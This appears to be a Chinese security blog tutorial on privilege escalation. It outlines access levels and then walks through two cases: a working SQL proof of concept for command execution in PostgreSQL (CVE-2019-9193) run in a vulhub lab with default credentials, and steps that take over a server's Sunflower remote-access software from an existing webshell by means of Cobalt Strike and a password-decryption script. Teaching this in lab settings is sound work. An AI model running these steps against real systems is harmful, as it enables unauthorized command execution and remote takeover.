权限提升-PostgreSQL数据库提权+第三方应用提权

权限提升基础信息

1、具体有哪些权限需要我们了解掌握的?

后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等

2、以上常见权限获取方法简要归类说明?

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入

网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell

数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入

接口权限:SQL注入,数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入

系统权限:高危系统漏洞直达或网站权限提升转入、数据库权限提升转入,第三方转入等

域控权限:高危系统漏洞直达或内网横向渗透转入,域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?

后台权限:

常规WEB界面文章分类等操作,后台功能可操作类

网站权限:

查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。

数据库权限:

操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限:

后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。

系统权限:如同在你自己操作自己的电脑一样

域控权限:如同在你自己操作自己的虚拟机一样

 

案例:数据库-PostgreSQL数据库权限提升-漏洞

提权利用的是漏洞:CVE-2019-9193 

介绍:

         PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,需要管理员或具有“COPY TO/FROM PROGRAM”权限的用户,就能使用这个特性执行任意命令。

演示开始

1.启动vulhub靶场 PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)环境

2.根据环境给到的数据库账号密码:postgres/postgres ,端口:5432  使用Navicat连接

3.连接成功后点击新建查询,执行漏洞POC:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM '命令';
SELECT * FROM cmd_exec;

成功执行命令:

案例:第三方应用提权-向日葵

前提条件:已有webshell权限

1.利用探针(查看端口,进程等)知道服务器安装了向日葵服务

执行:tasklist /svc

2.开启提权工具-CS

3.利用CS插件上传向日葵提权工具

4.上传

5.执行

6.机器密文就是验证码,使用Python高版本(大于3.8)执行解谜脚本Sunflower_get_Password进行解密。

下载:https://github.com/wafinfo/Sunflower_get_Password

接下来可以使用向日葵远控软件直接连接。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值